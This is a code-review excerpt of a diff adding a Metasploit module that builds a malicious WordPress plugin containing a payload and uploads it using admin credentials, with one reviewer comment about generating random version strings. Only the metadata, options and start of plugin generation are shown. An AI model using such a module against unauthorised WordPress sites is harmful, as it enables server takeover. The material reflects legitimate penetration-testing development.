modules/exploits/unix/webapp/wp_admin_shell_upload.rb

```diff
@@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Admin Shell Upload',
+      'Description'     => %q{
+          This module will generate a plugin, pack the payload into it
+          and upload it to a server running WordPress providing valid
+          admin credentials are used.
+        },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Rob Carr <rob[at]rastating.com>' # Metasploit module
+        ],
+      'DisclosureDate'  => 'Feb 21 2015',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+      ], self.class)
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def referer_uri
+    normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload')
+  end
+
+  def generate_plugin(plugin_name, payload_name)
+    r = Random.new
+    plugin_script = %Q{<?php
+/**
+ * Plugin Name: #{plugin_name}
+ * Version: #{r.rand(1..20)}.#{r.rand(0..20)}.#{r.rand(0..20)}
```

Comment:
we can use Rex::Text here. For example https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/text.rb#L1258